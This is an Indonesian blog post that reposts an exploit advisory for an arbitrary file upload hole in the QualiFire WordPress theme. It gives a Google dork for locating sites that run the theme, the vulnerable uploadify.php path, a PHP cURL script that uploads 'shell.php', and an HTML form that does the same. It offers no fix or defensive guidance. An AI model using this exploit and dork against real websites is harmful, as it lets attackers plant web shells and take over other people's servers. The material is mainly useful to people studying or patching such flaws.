Flash Go

Wordpress Themes QualiFire File Upload Vulnerability

Wordpress Themes QualiFire File Upload Vulnerability - Hallo sahabat Minato ET, Pada Artikel yang anda baca kali ini dengan judul Wordpress Themes QualiFire File Upload Vulnerability, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel File Upload, Artikel Wordpress, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : Wordpress Themes QualiFire File Upload Vulnerability
link : Wordpress Themes QualiFire File Upload Vulnerability

Baca juga


Wordpress Themes QualiFire File Upload Vulnerability


#- Title: Wordpress Themes QualiFire File Upload Vulnerability
#- Author: Tn_Scorpion
#- Date: 01-07-2012
#- Developer : AndonDesign
#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879
#- Google Dork: inurl:"/themes/qualifire/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --




Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

When Vuln : Blank

Remote file :
<?php
 
$uploadfile="shell.php";
$ch = curl_init("http://example .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
  print "$postResult";
?>

CSRF :
<form
action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>


Shell Path : Here


Demikianlah Artikel Wordpress Themes QualiFire File Upload Vulnerability

Sekianlah artikel Wordpress Themes QualiFire File Upload Vulnerability kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel Wordpress Themes QualiFire File Upload Vulnerability dengan alamat link https://minatoet.blogspot.com/2015/12/wordpress-themes-qualifire-file-upload.html

0 Response to "Wordpress Themes QualiFire File Upload Vulnerability"

Post a Comment